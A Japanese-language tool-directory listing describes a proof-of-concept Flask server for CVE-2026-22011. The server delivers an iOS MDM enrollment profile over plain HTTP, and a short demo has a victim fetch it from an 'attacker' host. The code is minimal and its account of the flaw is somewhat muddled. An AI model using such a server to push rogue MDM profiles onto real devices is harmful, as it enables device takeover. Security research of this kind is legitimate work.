Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — CVE-2026-22011 向けの PoC Flask サーバー。HTTP 経由で悪意のある iOS MDM 登録プロファイルを配信し、中間者攻撃による傍受とデバイスの侵害を可能にします。 | Kitploit
ツール/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
iOSセキュリティ脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストモバイルセキュリティ
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

CVE-2026-22011 向けの PoC Flask サーバー。HTTP 経由で悪意のある iOS MDM 登録プロファイルを配信し、中間者攻撃による傍受とデバイスの侵害を可能にします。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
16日前未レビュー

CVE-2026-22011 – HTTP 経由の iOS MDM プロファイル配信

プログラムコード(Python Flask MDM サーバー)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – HTTP 経由の iOS MDM プロファイル配信

Severity: High

概要

MDM 登録プロファイルが、暗号化やデジタル署名の検証なしに平文 HTTP で配信されます。同じネットワーク上の攻撃者はリクエストを傍受し、プロファイルを悪意のあるものに置き換えることで、デバイス管理権限を取得できます。

脆弱性の詳細

  • 種別: 中間者攻撃(Man‑in‑the‑Middle) / 安全でないトランスポート
  • 影響: 悪意のある MDM によるデバイスの完全な侵害。
  • 根本原因: プロファイル URL が HTTP であり、iOS が MDM 登録時に HTTPS を強制しない(設定に依存する)ため、傍受が可能になる。

エクスプロイトのデモンストレーション

攻撃者の HTTP サーバーを起動します:

root@kitploit:~
python mdm_server.py

被害者が http://attacker/enroll.mobileconfig にアクセスすると、悪意のあるプロファイルがダウンロードされます。

ツールをダウンロード